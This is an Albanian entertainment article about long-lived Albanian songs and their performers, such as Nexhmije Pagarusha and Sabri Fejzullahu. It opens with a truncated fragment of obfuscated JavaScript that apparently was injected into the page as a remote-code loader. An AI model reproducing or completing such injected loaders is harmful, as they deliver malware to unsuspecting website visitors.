;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Cilat janë këngët shqiptare që i mbijetuan dekadave? (VIDEO)

By

 

Janë artistët meritorë të skenës muzikore qe me vite sollën krijimtarinë e tyre para publikut aq të dashur.

Fytyrat e tyre mbetën ikona të muzikës dhe interpretimit të mirëfillt, deri sa këngët e tyre I mbijetuan dekada e dekadave.

Lista është e gjatë, megjithatë kohë më parë emisioni Prive solli emra artistësh e këngë që ngelën të pa vdekshme.

Paraprinë artistja më potente e historisë muzikore,Nexhmije Pagarusha. Kënga  e saj “Baresha”  ngeli perlë e muzikës shqiptare për afro pesë dekada.

Edhe këngëtari Sabri Fejzullahu numëron 50 vite në skenë, deri sa hit pas hiti këngët e tij u bënë hitë, mirëpo është kënga “Pranëvera në Prishtinë” ajo që që vazhdon mbetet aktuale sikur të ishte krijuar sot.

Shkurte Fejza, me këngën “Xhamadani vija vija” ani pse u soll e risoll nga artistë të ndryshëm në versione modern vazhdon të pëlqehet kaq shumë, mbase për zërin e ëmbël të Shkurtës por edhe për tematikën kombëtare të këngës.

Ilir Shaqiri me vite të tëra publikoi këngë të ndryshme si për vete ashtu edhe për artistë të tjerë.  Është “Poqari” kënga që përloti shumë mergimtarë derisa edhe në vend u shëndrrua një kolonë zanore e shumë projekteve.

Adelina Ismaili shumë e re në moshë iu bashkangjit artistëve që shumë shpejt do të shëndrroheshin në kolegë të saj.
Shumë këngë,shumë hite u regjistruan në karrierën e saj 30 vjecare, por është bashkëpunimi me grupin Elita 5 ajo që e solii atë me një këngë dhe imazh të cilin do ta regjistronim përgjithmonë në kujtesën tonë.

“A vritet pafajësia” është kënga që mbushi sytë me lot të shumë shqiptarëve  në kohën e realizimit të kësaj këngë po kalonin momentët më të vështira të jetës së tyre, por, edhe tash pas shumë vitesh, mbase sjell kujtimet e njejta dhe pëlqehet shumë.

Shumica e artistëve të përmendur kanë një jetë të tërë karrierë e krijimtari muzikore, por janë disa nga këngët e tyre ato që ngelën për herë të ngulitura në veshin e shumë adhuruesve të tyre./PRIVE.AL/

Artikuj të ngjashëm